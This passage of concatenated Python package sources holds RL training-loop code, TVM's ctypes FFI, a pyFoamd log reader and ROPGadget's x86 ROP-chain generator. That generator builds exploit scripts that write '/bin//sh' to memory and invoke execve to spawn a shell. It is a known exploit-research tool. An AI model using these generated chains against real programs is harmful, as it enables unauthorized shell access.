# TODO implement the "max XXX random action per scenarios"
pm_i, pq_v = self._short_circuit_actions(training_step, pm_i, pq_v, q_actions)
act = self._convert_all_act(pm_i)
return pm_i, pq_v, act
def _short_circuit_actions(self, training_step, pm_i, pq_v, q_actions):
if self._training_param.min_observe is not None and \
training_step < self._training_param.min_observe:
# action is replaced by do nothing due to the "observe only" specification
pm_i[:] = 0
pq_v[:] = q_actions[:, 0]
return pm_i, pq_v
def _init_global_train_loop(self):
alive_frame = np.zeros(self.__nb_env, dtype=int)
total_reward = np.zeros(self.__nb_env, dtype=np.float32)
return alive_frame, total_reward
def _update_loop(self, done, temp_reward, temp_done, alive_frame, total_reward, reward, epoch_num):
if self.__nb_env == 1:
# force end of episode at early stage of learning
if self._curr_iter_env >= self._max_iter_env_:
temp_done[0] = True
temp_reward[0] = self._max_reward
self._total_sucesses += 1
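# note (descriptive comment): reaching `_max_iter_env_` is treated as a successful episode:
# it is terminated manually and credited with `_max_reward`, which lets `_need_reset`
# progressively lengthen the allowed episode duration as the agent improves.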
done = temp_done
alive_frame[done] = 0
total_reward[done] = 0.
self._reset_num += np.sum(done)
if self._reset_num >= self.__nb_env:
# increase the "global epoch num" represented by "epoch_num" only when on average
# all environments are "done"
epoch_num += 1
self._reset_num = 0
total_reward[~done] += temp_reward[~done]
alive_frame[~done] += 1
return done, temp_reward, total_reward, alive_frame, epoch_num
def _init_local_train_loop(self):
# reward, done = np.zeros(self.nb_process), np.full(self.nb_process, fill_value=False, dtype=np.bool)
reward = np.zeros(self.__nb_env, dtype=np.float32)
done = np.full(self.__nb_env, fill_value=False, dtype=bool)
return reward, done
def _init_deep_q(self, training_param, env):
"""
This function initializes the neural network.
"""
if self.deep_q is None:
self.deep_q = self._nn_archi.make_nn(training_param)
self.init_obs_extraction(env.observation_space)
def _save_tensorboard(self, step, epoch_num, UPDATE_FREQ, epoch_rewards, epoch_alive):
"""save all the informations needed in tensorboard."""
if self._tf_writer is None:
return
# Log some useful metrics every even updates
if step % UPDATE_FREQ == 0 and epoch_num > 0:
if step % (10 * UPDATE_FREQ) == 0:
# print the top k "hardest" scenarios (i.e. the ones chosen the most often)
if self.verbose:
top_k = 10
if self._nb_chosen is not None:
array_ = np.argsort(self._nb_chosen)[-top_k:][::-1]
print("hardest scenarios\n{}".format(array_))
print("They have been chosen respectively\n{}".format(self._nb_chosen[array_]))
# print("Associated proba are\n{}".format(self._proba[array_]))
print("The number of timesteps played is\n{}".format(self._time_step_lived[array_]))
print("avg (accross all scenarios) number of timsteps played {}"
"".format(np.mean(self._time_step_lived)))
print("Time alive: {}".format(self._time_step_lived[array_] / (self._nb_chosen[array_] + 1)))
print("Avg time alive: {}".format(np.mean(self._time_step_lived / (self._nb_chosen + 1 ))))
with self._tf_writer.as_default():
last_alive = epoch_alive[(epoch_num-1)]
last_reward = epoch_rewards[(epoch_num-1)]
mean_reward = np.nanmean(epoch_rewards[:epoch_num])
mean_alive = np.nanmean(epoch_alive[:epoch_num])
mean_reward_30 = mean_reward
mean_alive_30 = mean_alive
mean_reward_100 = mean_reward
mean_alive_100 = mean_alive
tmp = self._actions_per_ksteps > 0
tmp = tmp.sum(axis=0)
nb_action_taken_last_kstep = np.sum(tmp > 0)
nb_illegal_act = np.sum(self._illegal_actions_per_ksteps)
nb_ambiguous_act = np.sum(self._ambiguous_actions_per_ksteps)
if epoch_num >= 100:
mean_reward_100 = np.nanmean(epoch_rewards[(epoch_num-100):epoch_num])
mean_alive_100 = np.nanmean(epoch_alive[(epoch_num-100):epoch_num])
if epoch_num >= 30:
mean_reward_30 = np.nanmean(epoch_rewards[(epoch_num-30):epoch_num])
mean_alive_30 = np.nanmean(epoch_alive[(epoch_num-30):epoch_num])
# to ensure "fair" comparison between single env and multi env
step_tb = step # * self.__nb_env
# if multiply by the number of env we have "trouble" with random exploration at the beginning
# because it lasts the same number of "real" steps
# show first the Mean reward and mine time alive (hence the upper case)
tf.summary.scalar("Mean_alive_30", mean_alive_30, step_tb,
description="Average number of steps (per episode) made over the last 30 "
"completed episodes")
tf.summary.scalar("Mean_reward_30", mean_reward_30, step_tb,
description="Average (final) reward obtained over the last 30 completed episodes")
# then it's alpha numerical order, hence the "z_" in front of some information
tf.summary.scalar("loss", self._losses[step], step_tb,
description="Training loss (for the last training batch)")
tf.summary.scalar("last_alive", last_alive, step_tb,
description="Final number of steps for the last complete episode")
tf.summary.scalar("last_reward", last_reward, step_tb,
description="Final reward over the last complete episode")
tf.summary.scalar("mean_reward", mean_reward, step_tb,
description="Average reward over the whole episodes played")
tf.summary.scalar("mean_alive", mean_alive, step_tb,
description="Average time alive over the whole episodes played")
tf.summary.scalar("mean_reward_100", mean_reward_100, step_tb,
description="Average number of steps (per episode) made over the last 100 "
"completed episodes")
tf.summary.scalar("mean_alive_100", mean_alive_100, step_tb,
description="Average (final) reward obtained over the last 100 completed episodes")
tf.summary.scalar("nb_different_action_taken", nb_action_taken_last_kstep, step_tb,
description="Number of different actions played the last "
"{} steps".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("nb_illegal_act", nb_illegal_act, step_tb,
description="Number of illegal actions played the last "
"{} steps".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("nb_ambiguous_act", nb_ambiguous_act, step_tb,
description="Number of ambiguous actions played the last "
"{} steps".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("nb_total_success", self._total_sucesses, step_tb,
description="Number of times the episode was completed entirely "
"(no game over)")
tf.summary.scalar("z_lr", self._train_lr, step_tb,
description="Current learning rate")
tf.summary.scalar("z_epsilon", self.epsilon, step_tb,
description="Current epsilon (from the epsilon greedy)")
tf.summary.scalar("z_max_iter", self._max_iter_env_, step_tb,
description="Maximum number of time steps before deciding a scenario "
"is over (=win)")
tf.summary.scalar("z_total_episode", epoch_num, step_tb,
description="Total number of episode played (number of \"reset\")")
self.deep_q.save_tensorboard(step_tb)
if self.store_action:
self._store_frequency_action_type(UPDATE_FREQ, step_tb)
# if self._time_step_lived is not None:
# tf.summary.histogram(
# "timestep_lived", self._time_step_lived, step=step_tb, buckets=None,
# description="Number of time steps lived for all scenarios"
# )
# if self._nb_chosen is not None:
# tf.summary.histogram(
# "nb_chosen", self._nb_chosen, step=step_tb, buckets=None,
# description="Number of times this scenarios has been played"
# )
def _store_frequency_action_type(self, UPDATE_FREQ, step_tb):
self.current_ += 1
self.current_ %= self.nb_
nb_inj, nb_volt, nb_topo, nb_line, nb_redisp, nb_storage, nb_curtail, nb_dn = self._nb_this_time[self.current_, :]
self._nb_this_time[self.current_, :] = [self.nb_injection,
self.nb_voltage,
self.nb_topology,
self.nb_line,
self.nb_redispatching,
self.nb_storage,
self.nb_curtail,
self.nb_do_nothing]
curr_inj = self.nb_injection - nb_inj
curr_volt = self.nb_voltage - nb_volt
curr_topo = self.nb_topology - nb_topo
curr_line = self.nb_line - nb_line
curr_redisp = self.nb_redispatching - nb_redisp
curr_storage = self.nb_storage - nb_storage
curr_curtail = self.nb_curtail - nb_curtail
curr_dn = self.nb_do_nothing - nb_dn
total_act_num = curr_inj + curr_volt + curr_topo + curr_line + curr_redisp + curr_dn + curr_storage + curr_curtail
tf.summary.scalar("zz_freq_inj",
curr_inj / total_act_num,
step_tb,
description="Frequency of \"injection\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("zz_freq_voltage",
curr_volt / total_act_num,
step_tb,
description="Frequency of \"voltage\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_topo",
curr_topo / total_act_num,
step_tb,
description="Frequency of \"topo\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_line_status",
curr_line / total_act_num,
step_tb,
description="Frequency of \"line status\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_redisp",
curr_redisp / total_act_num,
step_tb,
description="Frequency of \"redispatching\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_do_nothing",
curr_dn / total_act_num,
step_tb,
description="Frequency of \"do nothing\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_storage",
curr_storage / total_act_num,
step_tb,
description="Frequency of \"storage\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ))
tf.summary.scalar("z_freq_curtail",
curr_curtail / total_act_num,
step_tb,
description="Frequency of \"curtailment\" actions "
"type played over the last {} actions"
"".format(self.nb_ * UPDATE_FREQ)) | PypiClean |
/mera_tvm_host_only-1.3.1-cp36-cp36m-manylinux_2_27_x86_64.whl/tvm/_ffi/_ctypes/packed_func.py | """Function configuration API."""
import ctypes
import traceback
from numbers import Number, Integral
from ..base import _LIB, get_last_ffi_error, py2cerror, check_call
from ..base import c_str, string_types
from ..runtime_ctypes import DataType, TVMByteArray, Device, ObjectRValueRef
from . import ndarray as _nd
from .ndarray import NDArrayBase, _make_array
from .types import TVMValue, ArgTypeCode
from .types import TVMPackedCFunc, TVMCFuncFinalizer
from .types import RETURN_SWITCH, C_TO_PY_ARG_SWITCH, _wrap_arg_func, _device_to_int64
from .object import ObjectBase, PyNativeObject, _set_class_object
from . import object as _object
PackedFuncHandle = ctypes.c_void_p
ModuleHandle = ctypes.c_void_p
ObjectHandle = ctypes.c_void_p
TVMRetValueHandle = ctypes.c_void_p
def _ctypes_free_resource(rhandle):
"""callback to free resources when it is not needed."""
pyobj = ctypes.cast(rhandle, ctypes.py_object)
ctypes.pythonapi.Py_DecRef(pyobj)
# Global callback that is always alive
TVM_FREE_PYOBJ = TVMCFuncFinalizer(_ctypes_free_resource)
ctypes.pythonapi.Py_IncRef(ctypes.py_object(TVM_FREE_PYOBJ))
def _make_packed_func(handle, is_global):
"""Make a packed function class"""
obj = _CLASS_PACKED_FUNC.__new__(_CLASS_PACKED_FUNC)
obj.is_global = is_global
obj.handle = handle
return obj
def convert_to_tvm_func(pyfunc):
"""Convert a python function to TVM function
Parameters
----------
pyfunc : python function
The python function to be converted.
Returns
-------
tvmfunc: tvm.nd.Function
The converted tvm function.
"""
local_pyfunc = pyfunc
def cfun(args, type_codes, num_args, ret, _):
"""ctypes function"""
num_args = num_args.value if isinstance(num_args, ctypes.c_int) else num_args
pyargs = (C_TO_PY_ARG_SWITCH[type_codes[i]](args[i]) for i in range(num_args))
# pylint: disable=broad-except
try:
rv = local_pyfunc(*pyargs)
except Exception:
msg = traceback.format_exc()
msg = py2cerror(msg)
_LIB.TVMAPISetLastError(c_str(msg))
return -1
if rv is not None:
if isinstance(rv, tuple):
raise ValueError("PackedFunction can only support one return value")
temp_args = []
values, tcodes, _ = _make_tvm_args((rv,), temp_args)
if not isinstance(ret, TVMRetValueHandle):
ret = TVMRetValueHandle(ret)
if _LIB.TVMCFuncSetReturn(ret, values, tcodes, ctypes.c_int(1)) != 0:
raise get_last_ffi_error()
_ = temp_args
_ = rv
return 0
handle = PackedFuncHandle()
f = TVMPackedCFunc(cfun)
# NOTE: We will need to use python-api to increase ref count of the f
# TVM_FREE_PYOBJ will be called after it is no longer needed.
pyobj = ctypes.py_object(f)
ctypes.pythonapi.Py_IncRef(pyobj)
if _LIB.TVMFuncCreateFromCFunc(f, pyobj, TVM_FREE_PYOBJ, ctypes.byref(handle)) != 0:
raise get_last_ffi_error()
return _make_packed_func(handle, False)
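# Illustrative sketch of how this conversion is typically exercised through the
# public API (the function name "demo.add_one" below is an assumption made for
# the example, not something defined by this module):
#
#     import tvm
#
#     @tvm.register_func("demo.add_one")
#     def add_one(x):
#         return x + 1
#
#     f = tvm.get_global_func("demo.add_one")  # returns a PackedFunc
#     assert f(10) == 11
#
# `tvm.register_func` funnels the Python callable through convert_to_tvm_func,
# which wraps it in a TVMPackedCFunc whose lifetime is tied to TVM_FREE_PYOBJ.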
def _make_tvm_args(args, temp_args):
"""Pack arguments into c args tvm call accept"""
num_args = len(args)
values = (TVMValue * num_args)()
type_codes = (ctypes.c_int * num_args)()
for i, arg in enumerate(args):
if isinstance(arg, ObjectBase):
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.OBJECT_HANDLE
elif arg is None:
values[i].v_handle = None
type_codes[i] = ArgTypeCode.NULL
elif isinstance(arg, NDArrayBase):
values[i].v_handle = ctypes.cast(arg.handle, ctypes.c_void_p)
type_codes[i] = (
ArgTypeCode.NDARRAY_HANDLE if not arg.is_view else ArgTypeCode.DLTENSOR_HANDLE
)
elif isinstance(arg, PyNativeObject):
values[i].v_handle = arg.__tvm_object__.handle
type_codes[i] = ArgTypeCode.OBJECT_HANDLE
elif isinstance(arg, _nd._TVM_COMPATS):
values[i].v_handle = ctypes.c_void_p(arg._tvm_handle)
type_codes[i] = arg.__class__._tvm_tcode
elif isinstance(arg, Integral):
values[i].v_int64 = arg
type_codes[i] = ArgTypeCode.INT
elif isinstance(arg, Number):
values[i].v_float64 = arg
type_codes[i] = ArgTypeCode.FLOAT
elif isinstance(arg, DataType):
values[i].v_str = c_str(str(arg))
type_codes[i] = ArgTypeCode.STR
elif isinstance(arg, Device):
values[i].v_int64 = _device_to_int64(arg)
type_codes[i] = ArgTypeCode.DLDEVICE
elif isinstance(arg, (bytearray, bytes)):
# from_buffer only takes in bytearray.
if isinstance(arg, bytes):
byte_arr = bytearray(arg)
temp_args.append(byte_arr)
arg = byte_arr
arr = TVMByteArray()
arr.data = ctypes.cast(
(ctypes.c_byte * len(arg)).from_buffer(arg), ctypes.POINTER(ctypes.c_byte)
)
arr.size = len(arg)
values[i].v_handle = ctypes.c_void_p(ctypes.addressof(arr))
temp_args.append(arr)
type_codes[i] = ArgTypeCode.BYTES
elif isinstance(arg, string_types):
values[i].v_str = c_str(arg)
type_codes[i] = ArgTypeCode.STR
elif isinstance(arg, (list, tuple, dict, _CLASS_OBJECT_GENERIC)):
arg = _FUNC_CONVERT_TO_OBJECT(arg)
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.OBJECT_HANDLE
temp_args.append(arg)
elif isinstance(arg, _CLASS_MODULE):
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.MODULE_HANDLE
elif isinstance(arg, PackedFuncBase):
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.PACKED_FUNC_HANDLE
elif isinstance(arg, ctypes.c_void_p):
values[i].v_handle = arg
type_codes[i] = ArgTypeCode.HANDLE
elif isinstance(arg, ObjectRValueRef):
values[i].v_handle = ctypes.cast(ctypes.byref(arg.obj.handle), ctypes.c_void_p)
type_codes[i] = ArgTypeCode.OBJECT_RVALUE_REF_ARG
elif callable(arg):
arg = convert_to_tvm_func(arg)
values[i].v_handle = arg.handle
type_codes[i] = ArgTypeCode.PACKED_FUNC_HANDLE
temp_args.append(arg)
else:
raise TypeError("Don't know how to handle type %s" % type(arg))
return values, type_codes, num_args
class PackedFuncBase(object):
"""Function base."""
__slots__ = ["handle", "is_global"]
# pylint: disable=no-member
def __init__(self, handle, is_global):
"""Initialize the function with handle
Parameters
----------
handle : PackedFuncHandle
the handle to the underlying function.
is_global : bool
Whether this is a global function in python
"""
self.handle = handle
self.is_global = is_global
def __del__(self):
if not self.is_global and _LIB is not None:
if _LIB.TVMFuncFree(self.handle) != 0:
raise get_last_ffi_error()
def __call__(self, *args):
"""Call the function with positional arguments
args : list
The positional arguments to the function call.
"""
temp_args = []
values, tcodes, num_args = _make_tvm_args(args, temp_args)
ret_val = TVMValue()
ret_tcode = ctypes.c_int()
if (
_LIB.TVMFuncCall(
self.handle,
values,
tcodes,
ctypes.c_int(num_args),
ctypes.byref(ret_val),
ctypes.byref(ret_tcode),
)
!= 0
):
raise get_last_ffi_error()
_ = temp_args
_ = args
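# The two assignments above only keep `temp_args`/`args` referenced until the C
# call has returned, so temporary buffers and converted objects passed by
# pointer are not garbage collected while the callee may still read them.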
return RETURN_SWITCH[ret_tcode.value](ret_val)
def __init_handle_by_constructor__(fconstructor, args):
"""Initialize handle by constructor"""
temp_args = []
values, tcodes, num_args = _make_tvm_args(args, temp_args)
ret_val = TVMValue()
ret_tcode = ctypes.c_int()
if (
_LIB.TVMFuncCall(
fconstructor.handle,
values,
tcodes,
ctypes.c_int(num_args),
ctypes.byref(ret_val),
ctypes.byref(ret_tcode),
)
!= 0
):
raise get_last_ffi_error()
_ = temp_args
_ = args
assert ret_tcode.value == ArgTypeCode.OBJECT_HANDLE
handle = ret_val.v_handle
return handle
def _return_module(x):
"""Return function"""
handle = x.v_handle
if not isinstance(handle, ModuleHandle):
handle = ModuleHandle(handle)
return _CLASS_MODULE(handle)
def _handle_return_func(x):
"""Return function"""
handle = x.v_handle
if not isinstance(handle, PackedFuncHandle):
handle = PackedFuncHandle(handle)
return _CLASS_PACKED_FUNC(handle, False)
def _get_global_func(name, allow_missing=False):
handle = PackedFuncHandle()
check_call(_LIB.TVMFuncGetGlobal(c_str(name), ctypes.byref(handle)))
if handle.value:
return _make_packed_func(handle, False)
if allow_missing:
return None
raise ValueError("Cannot find global function %s" % name)
# setup return handle for function type
_object.__init_by_constructor__ = __init_handle_by_constructor__
RETURN_SWITCH[ArgTypeCode.PACKED_FUNC_HANDLE] = _handle_return_func
RETURN_SWITCH[ArgTypeCode.MODULE_HANDLE] = _return_module
RETURN_SWITCH[ArgTypeCode.NDARRAY_HANDLE] = lambda x: _make_array(x.v_handle, False, True)
C_TO_PY_ARG_SWITCH[ArgTypeCode.PACKED_FUNC_HANDLE] = _wrap_arg_func(
_handle_return_func, ArgTypeCode.PACKED_FUNC_HANDLE
)
C_TO_PY_ARG_SWITCH[ArgTypeCode.MODULE_HANDLE] = _wrap_arg_func(
_return_module, ArgTypeCode.MODULE_HANDLE
)
C_TO_PY_ARG_SWITCH[ArgTypeCode.DLTENSOR_HANDLE] = lambda x: _make_array(x.v_handle, True, False)
C_TO_PY_ARG_SWITCH[ArgTypeCode.NDARRAY_HANDLE] = _wrap_arg_func(
lambda x: _make_array(x.v_handle, False, True), ArgTypeCode.NDARRAY_HANDLE
)
_CLASS_MODULE = None
_CLASS_PACKED_FUNC = None
_CLASS_OBJECT_GENERIC = None
_FUNC_CONVERT_TO_OBJECT = None
def _set_class_module(module_class):
"""Initialize the module."""
global _CLASS_MODULE
_CLASS_MODULE = module_class
def _set_class_packed_func(packed_func_class):
global _CLASS_PACKED_FUNC
_CLASS_PACKED_FUNC = packed_func_class
def _set_class_object_generic(object_generic_class, func_convert_to_object):
global _CLASS_OBJECT_GENERIC
global _FUNC_CONVERT_TO_OBJECT
_CLASS_OBJECT_GENERIC = object_generic_class
_FUNC_CONVERT_TO_OBJECT = func_convert_to_object | PypiClean |
/ROPGadget-7.4-py3-none-any.whl/ropgadget/ropchain/arch/ropmakerx86.py |
import re
class ROPMakerX86(object):
def __init__(self, binary, gadgets, liboffset=0x0):
self.__binary = binary
self.__gadgets = gadgets
# If it's a library, we have the option to add an offset to the addresses
self.__liboffset = liboffset
self.__generate()
def __lookingForWrite4Where(self, gadgetsAlreadyTested):
for gadget in self.__gadgets:
if gadget in gadgetsAlreadyTested:
continue
f = gadget["gadget"].split(" ; ")[0]
# regex -> mov dword ptr [r32], r32
regex = re.search("mov dword ptr \[(?P<dst>([(eax)|(ebx)|(ecx)|(edx)|(esi)|(edi)]{3}))\], (?P<src>([(eax)|(ebx)|(ecx)|(edx)|(esi)|(edi)]{3}))$", f)
if regex:
lg = gadget["gadget"].split(" ; ")[1:]
try:
for g in lg:
if g.split()[0] != "pop" and g.split()[0] != "ret":
raise
# we need this to filter out 'ret' instructions with an offset like 'ret 0x6', because they ruin the stack pointer
if g != "ret":
if g.split()[0] == "ret" and g.split()[1] != "":
raise
print("\t[+] Gadget found: 0x%x %s" % (gadget["vaddr"], gadget["gadget"]))
return [gadget, regex.group("dst"), regex.group("src")]
except:
continue
return None
def __lookingForSomeThing(self, something):
for gadget in self.__gadgets:
lg = gadget["gadget"].split(" ; ")
if lg[0] == something:
try:
for g in lg[1:]:
if g.split()[0] != "pop" and g.split()[0] != "ret":
raise
# we need this to filter out 'ret' instructions with an offset like 'ret 0x6', because they ruin the stack pointer
if g != "ret":
if g.split()[0] == "ret" and g.split()[1] != "":
raise
print("\t[+] Gadget found: 0x%x %s" % (gadget["vaddr"], gadget["gadget"]))
return gadget
except:
continue
return None
def __padding(self, gadget, regAlreadSetted):
lg = gadget["gadget"].split(" ; ")
for g in lg[1:]:
if g.split()[0] == "pop":
reg = g.split()[1]
try:
print("\tp += pack('<I', 0x%08x) # padding without overwrite %s" % (regAlreadSetted[reg], reg))
except KeyError:
print("\tp += pack('<I', 0x41414141) # padding")
def __buildRopChain(self, write4where, popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall):
sects = self.__binary.getDataSections()
dataAddr = None
for s in sects:
if s["name"] == ".data":
dataAddr = s["vaddr"] + self.__liboffset
if dataAddr is None:
print("\n[-] Error - Can't find a writable section")
return
print("#!/usr/bin/env python3")
print("# execve generated by ROPgadget\n")
print("from struct import pack\n")
print("# Padding goes here")
print("p = b''\n")
print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data" % dataAddr)
self.__padding(popDst, {})
print("p += pack('<I', 0x%08x) # %s" % (popSrc["vaddr"], popSrc["gadget"]))
print("p += b'/bin'")
self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr}) # Don't overwrite reg dst
print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
self.__padding(write4where, {})
print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data + 4" % (dataAddr + 4))
self.__padding(popDst, {})
print("p += pack('<I', 0x%08x) # %s" % (popSrc["vaddr"], popSrc["gadget"]))
print("p += b'//sh'")
self.__padding(popSrc, {popDst["gadget"].split()[1]: dataAddr + 4}) # Don't overwrite reg dst
print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
self.__padding(write4where, {})
print("p += pack('<I', 0x%08x) # %s" % (popDst["vaddr"], popDst["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
self.__padding(popDst, {})
print("p += pack('<I', 0x%08x) # %s" % (xorSrc["vaddr"], xorSrc["gadget"]))
self.__padding(xorSrc, {})
print("p += pack('<I', 0x%08x) # %s" % (write4where["vaddr"], write4where["gadget"]))
self.__padding(write4where, {})
print("p += pack('<I', 0x%08x) # %s" % (popEbx["vaddr"], popEbx["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data" % dataAddr)
self.__padding(popEbx, {})
print("p += pack('<I', 0x%08x) # %s" % (popEcx["vaddr"], popEcx["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
self.__padding(popEcx, {"ebx": dataAddr}) # Don't overwrite ebx
print("p += pack('<I', 0x%08x) # %s" % (popEdx["vaddr"], popEdx["gadget"]))
print("p += pack('<I', 0x%08x) # @ .data + 8" % (dataAddr + 8))
self.__padding(popEdx, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
print("p += pack('<I', 0x%08x) # %s" % (xorEax["vaddr"], xorEax["gadget"]))
self.__padding(xorEax, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
for _ in range(11):
print("p += pack('<I', 0x%08x) # %s" % (incEax["vaddr"], incEax["gadget"]))
self.__padding(incEax, {"ebx": dataAddr, "ecx": dataAddr + 8}) # Don't overwrite ebx and ecx
print("p += pack('<I', 0x%08x) # %s" % (syscall["vaddr"], syscall["gadget"]))
def __generate(self):
# To find the smaller gadget
self.__gadgets.reverse()
print("\nROP chain generation\n===========================================================")
print("\n- Step 1 -- Write-what-where gadgets\n")
gadgetsAlreadyTested = []
while True:
write4where = self.__lookingForWrite4Where(gadgetsAlreadyTested)
if not write4where:
print("\t[-] Can't find the 'mov dword ptr [r32], r32' gadget")
return
popDst = self.__lookingForSomeThing("pop %s" % write4where[1])
if not popDst:
print("\t[-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" % write4where[1])
gadgetsAlreadyTested += [write4where[0]]
continue
popSrc = self.__lookingForSomeThing("pop %s" % write4where[2])
if not popSrc:
print("\t[-] Can't find the 'pop %s' gadget. Try with another 'mov [reg], reg'\n" % write4where[2])
gadgetsAlreadyTested += [write4where[0]]
continue
xorSrc = self.__lookingForSomeThing("xor %s, %s" % (write4where[2], write4where[2]))
if not xorSrc:
print("\t[-] Can't find the 'xor %s, %s' gadget. Try with another 'mov [r], r'\n" % (write4where[2], write4where[2]))
gadgetsAlreadyTested += [write4where[0]]
continue
else:
break
print("\n- Step 2 -- Init syscall number gadgets\n")
xorEax = self.__lookingForSomeThing("xor eax, eax")
if not xorEax:
print("\t[-] Can't find the 'xor eax, eax' instruction")
return
incEax = self.__lookingForSomeThing("inc eax")
if not incEax:
print("\t[-] Can't find the 'inc eax' instruction")
return
print("\n- Step 3 -- Init syscall arguments gadgets\n")
popEbx = self.__lookingForSomeThing("pop ebx")
if not popEbx:
print("\t[-] Can't find the 'pop ebx' instruction")
return
popEcx = self.__lookingForSomeThing("pop ecx")
if not popEcx:
print("\t[-] Can't find the 'pop ecx' instruction")
return
popEdx = self.__lookingForSomeThing("pop edx")
if not popEdx:
print("\t[-] Can't find the 'pop edx' instruction")
return
print("\n- Step 4 -- Syscall gadget\n")
syscall = self.__lookingForSomeThing("int 0x80")
if not syscall:
print("\t[-] Can't find the 'syscall' instruction")
return
print("\n- Step 5 -- Build the ROP chain\n")
self.__buildRopChain(write4where[0], popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall) | PypiClean |
/pyFoamd-0.1.0-py3-none-any.whl/pyfoamd/functions/getMonitor.py | from pathlib import Path
import numpy as np
import pyfoamd.types as pt
from pyfoamd import userMsg
import logging
logger = logging.getLogger('pf')
def getMonitor(name=None, startTime='latestTime', dataFileName=None,
logPath=None, workingDir=Path.cwd()):
"""
Get an ofMonitor object from a log file written to the 'postProcessing/'
directory.
Data file is either specified by a `name` and `startTime` argument or a
`logPath`. If `logPath` is specified, the `name` and `startTime` arguments are
ignored.
Post processing data is typically stored as:
postProcessing/<name>/<startTime>/<dataFile>.dat
Parameters:
name [str]: The name of the post-processing function object (monitor)
for which data is to be extracted.
startTime [str]: The start time from which to read the log
data. Accepts a string value as either `latestTime` or a numerical
value indicating the start time. If `latestTime`, data will be read
from the last time in the `name` directory. If 'all', collects data
from all start times available for the monitor.
dataFileName [str]: The name of the data file to read within the start
time directory. If not specified, the last log file found in that
directory is used.
logPath [str]: The path of the log file to read. If specified, the
`name` and `startTime` arguments are ignored.
workingDir [Path]: The case directory. Defaults to the current working
directory.
Returns:
monitor [ofMonitor]: The monitor data parsed from the log file.
"""
# logging.getLogger('pf').setLevel(logging.DEBUG)
if startTime == 'all':
allTimes = True
else:
allTimes = False
if logPath is None:
if startTime == 'latestTime' or startTime == 'all':
timePath = Path(workingDir) / 'postProcessing' / name
startTime = 0
for time in timePath.iterdir():
try:
time_ = float(time.name)
if time_ > float(startTime):
startTime = time.name
except ValueError:
pass
startTime = str(startTime)
logPathParent = (Path(workingDir) / 'postProcessing' / name
/ str(startTime))
if dataFileName is None:
#TODO: This just takes the first log file in the list. Is there a
# better way?
logFileNames = []
for path in logPathParent.iterdir():
if path.is_file():
logFileNames.append(path.name)
if len(logFileNames) > 1:
userMsg("Found multiple log files, defualting to last item in list: " \
+str(logFileNames), "WARNING"
)
elif len(logFileNames) == 0:
userMsg("Could not find any log file in directory {logPathParent}",
"ERROR")
logPath = logPathParent / logFileNames[-1]
else:
logPath = logPathParent / dataFileName
logger.debug(f"logPath: {logPath}")
monitor = pt.MonitorParser(logPath).makeOFMonitor()
# data = np.loadtxt(logPath, delimiter="\s+")
return monitor | PypiClean |
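# ---------------------------------------------------------------------------
# Minimal usage sketch (illustrative only). The monitor name 'residuals' is an
# assumption: it must match a directory under 'postProcessing/' in the case
# pointed to by `workingDir`.
if __name__ == "__main__":
    monitor = getMonitor(name="residuals", startTime="latestTime",
                         workingDir=Path.cwd())
    print(monitor)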
/dsin100daysv31-6.0.1.tar.gz/dsin100daysv31-6.0.1/notebook/static/custom/custom.js | *
*
* Placeholder for custom user javascript
* mainly to be overridden in profile/static/custom/custom.js
* This will always be an empty file in IPython
*
* User could add any javascript in the `profile/static/custom/custom.js` file.
* It will be executed by the ipython notebook at load time.
*
* Same thing with `profile/static/custom/custom.css` to inject custom css into the notebook.
*
*
 * The objects available at load time depend on the version of IPython in use.
 * There are no guarantees of API stability.
*
 * The example below explains the principle and might not be valid.
*
* Instances are created after the loading of this file and might need to be accessed using events:
* define([
* 'base/js/namespace',
* 'base/js/promises'
* ], function(IPython, promises) {
* promises.app_initialized.then(function (appName) {
* if (appName !== 'NotebookApp') return;
* IPython.keyboard_manager....
* });
* });
*
* __Example 1:__
*
* Create a custom button in toolbar that execute `%qtconsole` in kernel
* and hence open a qtconsole attached to the same kernel as the current notebook
*
* define([
* 'base/js/namespace',
* 'base/js/promises'
* ], function(IPython, promises) {
* promises.app_initialized.then(function (appName) {
* if (appName !== 'NotebookApp') return;
* IPython.toolbar.add_buttons_group([
* {
* 'label' : 'run qtconsole',
* 'icon' : 'icon-terminal', // select your icon from http://fortawesome.github.io/Font-Awesome/icons
* 'callback': function () {
* IPython.notebook.kernel.execute('%qtconsole')
* }
* }
* // add more button here if needed.
* ]);
* });
* });
*
* __Example 2:__
*
* At the completion of the dashboard loading, load an unofficial javascript extension
* that is installed in profile/static/custom/
*
